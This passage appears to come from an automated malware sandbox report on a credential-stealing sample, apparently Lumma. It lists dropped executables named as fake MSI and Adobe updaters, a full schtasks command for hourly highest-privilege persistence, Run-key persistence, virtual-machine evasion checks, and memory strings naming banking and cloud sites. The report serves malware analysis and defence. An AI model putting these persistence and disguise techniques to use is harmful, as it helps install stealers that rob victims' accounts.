                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00A949ED push ebp; ret 0_2_00A94A32
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_009D9EAB push ebx; iretd 0_2_009D9EDE
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00853F59 push ecx; ret 0_2_00853F6C
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004E4721 push ecx; ret 7_2_004E4734
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00BF4721 push ecx; ret 9_2_00BF4734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043C609 push ecx; ret 12_2_0043C613
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043DA48 push ecx; retf 12_2_0043DA4B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043CEA2 push cs; ret 12_2_0043CEA3
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00E94721 push ecx; ret 17_2_00E94734
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00E94721 push ecx; ret 20_2_00E94734
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile created: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeJump to dropped file
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile created: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeJump to dropped file
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeJump to dropped file
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile created: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7Jump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7Jump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00A6400F rdtsc 0_2_00A6400F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5048Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6336Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5484Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5936Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6504Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2664Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2488Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004F4253 FindFirstFileExW,7_2_004F4253
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00C04253 FindFirstFileExW,9_2_00C04253
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00EA4253 FindFirstFileExW,17_2_00EA4253
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00EA4253 FindFirstFileExW,20_2_00EA4253
                  Source: Amcache.hve.15.drBinary or memory string: VMware
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: discord.comVMware20,11696487552f
                  Source: RegAsm.exe, 00000015.00000002.2456254141.000000000144A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                  Source: Amcache.hve.15.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2350449893.000000000097A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2244993517.000000000114A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456254141.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: global block list test formVMware20,11696487552
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Amcache.hve.15.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2259208520.0000000006130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}9+DtRuOIzpuPOHMWFCH4SYrrhIIF+VmRVSkbN671zwLeLYomOj6BxuG4WR0H8+Rivo4a5BAWT1bV5dHpshkYrOka+p8vn3VPA9qlgL8Tk27kWvHNRJXPl7UkYvCoDMNFU/36++C/jG6pgvhw/J6+PCmsW1ynBiLNzuR9AXJKT6RtkzVJ5JXS6W4LXIi22NeLtP7Ikk+0n7QDGjovSf2FNmrxFItlk5hpx/2HxYs7bUXx8wlhYhOe6vmYTYhwDGkC95TfsGbkuhMXPDu24Tk7yZ0vkv8IwoJIe02kWQ6IIm9jZj5kyhHMSGTfMV1KramijuIQ61Lh4JuwhDKy5sdv4lPBppbXLx9SLeTS6Kn4usBfnhOPZZ7l5cpc73VFZYd77s7LnUzNMXxxIpimnULqgLSaHyIqzMQjKsPItp3JQyx5CerGBHz+72bou4eRv4TJR7md171SZI7d8swF+mIEVAJCa+4QbnpduN+YKaqd+XlImpqvGTlKejMnbf5C3VoY6JqyIprHM127oDjSKid9WWwYkCjOIWoJ9cPNs1rEHZ7g0TIw+CKfhqUxdWSSZy1s0xEmvRteTep7wHsWEq3bric1I0yUTA1xPBeKNpfYj0KIFBfGvzhZMFqKcVarTu4qW7iA/0/ou6h8oRON7pvR/Drqz1sh2V/nTyeLJBoScoTC2kP+Z5joN7z4enaTfObIPJ73aAl7nk82ybN7HgXREVh9sTgLim/ZFJ5ILI8FVqHlTjEcHZYzg3iLhWWXwtL8duCV9PO06EahABTLaH/dJMlgRfEm+xqei1EiLMQRE1A3wjzPysQesfpyIP7QZIIOwr8Fac1720ciptOJHnqRhOYMUatUHgvBfyvSdxZFncyCHH8s5lxNPR9Ckhzt/OyLoXmbZmd7lnu+m7uljsgn0XpsdfOO+Hb6A8sp3Lny7Crg5eEH7FkVTGHF1dB5sUfLHUBgegCLm9az5mP4IHm53G3d6FaRVSjxbt/cmY1A4yoMWgbu753WBLmKf7XoP0a3ATliu2meo4ycXIQcFDZxSBsE/n8lIc9Rjs7JH9hU+UalUXvLlk3QUNIdExIuU0zLb9VKS5YYAUp8v1L58qp6JEfI2T1GH8BNpLTSa1mvlaKprJUJIpnWr30WVhfG1wRno7Ou3cF2tpP3xF2pkOU5vy86XhhyxlqE9HTLQYUMojgV8q9ODzUXLbxWzK/ZKI3rkrIGFkZmRdr0WffmX91WbitQH63DCEnQ3rutG1DBIXV73QYXkiqmMW8Vu+F6IYaFLPFibpYCvWdqa5euzm4wASrFl7hx59wixe916VrWor7/LR1RwbfRM3ZDHiA9d+r6uLhAvkHE/7GY8XhfjaF3eiso7gDvw56tlyKHcJ9locNvwwauttSLO9tH2h4ABpfxVeWp5cNhRjml3ecGiVDs4vikm7dU4OOrv4FdDu3621TEC0ZAvx3cJzKlwVHqcJLgEQoOC9dwoKN8VJSL1Uo6cd8X/oURNbmKMNyh3jqv8o3J29EtLi4ZBGlmf8ljmlqYy97XCx4/+XmHd8a7VK/ZK+ox1GWo1ve2zhapCJZntBNUx2+Ab5E8v7CAFVcOpXvV+AAAxe3TeLs943LDxb4iTGvD6fIRB4J6ZR6jI+EPw959sgDkaVvANG7Nr72KQ8LuBIgyQfqf+m+iHiUj4SLub8eUbGXr45sj5eH6SVxU0CxrdR34NEWUjCII5KmpCckr5zRxXbaffxgnZdm2vKKO081W1smR0p8/nOBzQ8DI3feQCIChRSRIOORV9wT6RphUcA0b4nNYsG/2swVxRBK8YOLh3g0mmEmUKjzBNi369LJUIgTx1nP/
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: Amcache.hve.15.drBinary or memory string: vmci.sys
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2B
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: Amcache.hve.15.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.15.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.15.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.15.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.15.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2147630873.000000000613F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjo
                  Source: Amcache.hve.15.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.15.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.15.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.15.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: Amcache.hve.15.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin
                  Source: RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhf
                  Source: Amcache.hve.15.drBinary or memory string: VMware, Inc.
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2092231965.00000000014C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2153594744.000000000614F000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2153450957.000000000614B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                  Source: Amcache.hve.15.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.15.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.15.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.15.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                  Source: Amcache.hve.15.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2153450957.000000000614B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}9+DtRuOIzpuPOHMWFCH4SYrrhIIF+VmRVSkbN671zwLeLYomOj6BxuG4WR0H8+Rivo4a5BAWT1bV5dHpshkYrOka+p8vn3VPA9qlgL8Tk27kWvHNRJXPl7UkYvCoDMNFU/36++C/jG6pgvhw/J6+PCmsW1ynBiLNzuR9AXJKT6RtkzVJ5JXS6W4LXIi22NeLtP7Ikk+0n7QDGjovSf2FNmrxFItlk5hpx/2HxYs7bUXx8wlhYhOe6vmYTYhwDGkC95TfsGbkuhMXPDu24Tk7yZ0vkv8IwoJIe02kWQ6IIm9jZj5kyhHMSGTfMV1KramijuIQ61Lh4JuwhDKy5sdv4lPBppbXLx9SLeTS6Kn4usBfnhOPZZ7l5cpc73VFZYd77s7LnUzNMXxxIpimnULqgLSaHyIqzMQjKsPItp3JQyx5CerGBHz+72bou4eRv4TJR7md171SZI7d8swF+mIEVAJCa+4QbnpduN+YKaqd+XlImpqvGTlKejMnbf5C3VoY6JqyIprHM127oDjSKid9WWwYkCjOIWoJ9cPNs1rEHZ7g0TIw+CKfhqUxdWSSZy1s0xEmvRteTep7wHsWEq3bric1I0yUTA1xPBeKNpfYj0KIFBfGvzhZMFqKcVarTu4qW7iA/0/ou6h8oRON7pvR/Drqz1sh2V/nTyeLJBoScoTC2kP+Z5joN7z4enaTfObIPJ73aAl7nk82ybN7HgXREVh9sTgLim/ZFJ5ILI8FVqHlTjEcHZYzg3iLhWWXwtL8duCV9PO06EahABTLaH/dJMlgRfEm+xqei1EiLMQRE1A3wjzPysQesfpyIP7QZIIOwr8Fac1720ciptOJHnqRhOYMUatUHgvBfyvSdxZFncyCHH8s5lxNPR9Ckhzt/OyLoXmbZmd7lnu+m7uljsgn0XpsdfOO+Hb6A8sp3Lny7Crg5eEH7FkVTGHF1dB5sUfLHUBgegCLm9az5mP4IHm53G3d6FaRVSjxbt/cmY1A4yoMWgbu753WBLmKf7XoP0a3ATliu2meo4ycXIQcFDZxSBsE/n8lIc9Rjs7JH9hU+UalUXvLlk3QUNIdExIuU0zLb9VKS5YYAUp8v1L58qp6JEfI2T1GH8BNp